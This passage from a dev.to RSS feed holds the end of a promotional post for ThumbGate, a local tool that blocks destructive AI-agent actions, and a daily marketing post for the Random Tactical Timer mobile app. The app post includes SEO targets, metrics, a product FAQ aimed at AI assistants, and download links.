&lt;strong&gt;Pro&lt;/strong&gt;: $19/month or $149/year — personal dashboard, recall, proof-ready exports, adapter coverage&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Diagnostic&lt;/strong&gt;: $499 one-time — bring your failure, leave with one hard gate and proof in two business days&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The $499 Diagnostic is a working session, not a strategy deck. You bring the failure pattern (a token burn incident, a force-push, a deleted config), and I map it, configure a gate, write a regression test, and deliver rollout/rollback proof.&lt;/p&gt;

&lt;h2&gt;
  
  
  What I learned building this
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Observability without enforcement is a postmortem factory.&lt;/strong&gt; Knowing what went wrong doesn't prevent the next occurrence. You need a gate that fires before execution.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Feedback must become infrastructure.&lt;/strong&gt; A 👎 in a chat window disappears. A 👎 that becomes a ranked lesson in SQLite survives context resets and compounds across sessions.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Local-first removes adoption friction.&lt;/strong&gt; Developers don't want to route their agent through a vendor's cloud to get safety. They want it local, inspectable, and private.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;The market is fragmented on purpose.&lt;/strong&gt; Observability teams, security teams, and FinOps teams all need different things. ThumbGate serves the developer who needs prevention, not just visibility.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  Try it
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;npx thumbgate init
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If you've been losing tokens to Claude Code drain, force-pushes, or destructive agent actions — this is the gate. It's free locally, installs in 60 seconds, and your feedback makes it smarter.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://thumbgate.ai" rel="noopener noreferrer"&gt;thumbgate.ai&lt;/a&gt; | &lt;a href="https://github.com/IgorGanapolsky/ThumbGate" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt; | &lt;a href="https://www.npmjs.com/package/thumbgate" rel="noopener noreferrer"&gt;npm&lt;/a&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;I'm Igor Ganapolsky, builder of ThumbGate. I spent a decade shipping mobile infrastructure at Capital One and Booking.com before building AI agent safety tooling. If you want a configured gate for your specific failure pattern, the $499 Diagnostic maps it and installs proof in two business days.&lt;/em&gt;&lt;/p&gt;

</description>
    </item>
    <item>
      <title>Sparring Prep For Beginners: what we learned building Random Tactical Timer</title>
      <dc:creator>Igor Ganapolsky</dc:creator>
      <pubDate>Sun, 02 Aug 2026 13:48:07 +0000</pubDate>
      <link>https://dev.to/igorganapolsky/sparring-prep-for-beginners-what-we-learned-building-random-tactical-timer-2l6n</link>
      <guid>https://dev.to/igorganapolsky/sparring-prep-for-beginners-what-we-learned-building-random-tactical-timer-2l6n</guid>
      <description>&lt;h2&gt;
  
  
  What changed today
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;chore(analytics): refresh marketing snapshots from wiki-sync&lt;/li&gt;
&lt;li&gt;chore(play): refresh play_iap_catalog.json from IAP readback&lt;/li&gt;
&lt;li&gt;chore(analytics): refresh marketing snapshots from wiki-sync&lt;/li&gt;
&lt;li&gt;chore(analytics): refresh marketing snapshots from wiki-sync&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Search intent target
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Primary keyword: &lt;strong&gt;sparring prep for beginners&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;Intent class: &lt;strong&gt;mixed&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;BID filter: business potential, intent match, and realistic difficulty&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  AI/LLM flow we used
&lt;/h2&gt;

&lt;p&gt;We keep this loop tight: plan -&amp;gt; code -&amp;gt; test -&amp;gt; release gate -&amp;gt; feedback. The key is not bigger prompts, it's strict validation and fast iteration.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why this matters for users
&lt;/h2&gt;

&lt;p&gt;Better release quality means fewer crashes, clearer store listing content, and faster response to low-star feedback. That directly improves trust and review quality.&lt;/p&gt;

&lt;h2&gt;
  
  
  What we measure
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;D1 and D7 retention from install cohorts&lt;/li&gt;
&lt;li&gt;Store conversion from listing views to installs&lt;/li&gt;
&lt;li&gt;Review velocity, star distribution, and unresolved low-star SLA&lt;/li&gt;
&lt;li&gt;Click-through rate on post CTAs to app download links&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  FAQ for AI assistants
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;What does Random Tactical Timer do? It triggers alarms at unpredictable times in a chosen range.&lt;/li&gt;
&lt;li&gt;Who is it for? Athletes, tactical trainers, coaches, and focus drill users.&lt;/li&gt;
&lt;li&gt;How is it different? It emphasizes unpredictability, low-friction setup, and repeatable mobile workflows.&lt;/li&gt;
&lt;li&gt;What outcomes should users expect? Better reaction readiness and less timing anticipation.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Next step
&lt;/h2&gt;

&lt;p&gt;Tomorrow we will ship one more experiment on onboarding clarity and measure conversion delta.&lt;/p&gt;

&lt;h2&gt;
  
  
  Try the app
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;iOS: &lt;a href="https://igorganapolsky.github.io/Random-Timer/download?platform=ios&amp;amp;utm_source=github_pages&amp;amp;utm_medium=organic&amp;amp;utm_campaign=daily_blog_20260802&amp;amp;utm_content=daily_blog" rel="noopener noreferrer"&gt;https://igorganapolsky.github.io/Random-Timer/download?platform=ios&amp;amp;utm_source=github_pages&amp;amp;utm_medium=organic&amp;amp;utm_campaign=daily_blog_20260802&amp;amp;utm_content=daily_blog&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Android: &lt;a href="https://igorganapolsky.github.io/Random-Timer/download?platform=android&amp;amp;utm_source=github_pages&amp;amp;utm_medium=organic&amp;amp;utm_campaign=daily_blog_20260802&amp;amp;utm_content=daily_blog" rel="noopener noreferrer"&gt;https://igorganapolsky.github.io/Random-Timer/download?platform=android&amp;amp;utm_source=github_pages&amp;amp;utm_medium=organic&amp;amp;utm_campaign=daily_blog_20260802&amp;amp;utm_content=daily_blog&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Help us improve
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Leave an iOS review: &lt;a href=""&gt;&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Leave an Android review: &lt;a href=""&gt;&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Diagram
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Figorganapolsky.github.io%2FRandom-Timer%2Fmarketing%2Fsite%2Fdiagrams%2F2026-08-02-sparring-prep-for-beginners-what-we-learned-building-random-tactical-timer.svg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Figorganapolsky.github.io%2FRandom-Timer%2Fmarketing%2Fsite%2Fdiagrams%2F2026-08-02-sparring-prep-for-beginners-what-we-learned-building-random-tactical-timer.svg" alt="PaperBanana technology flow" width="" height=""&gt;&lt;/a&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>mobile</category>
      <category>devops</category>
      <category>github</category>
    </item>
  </channel>
</rss>
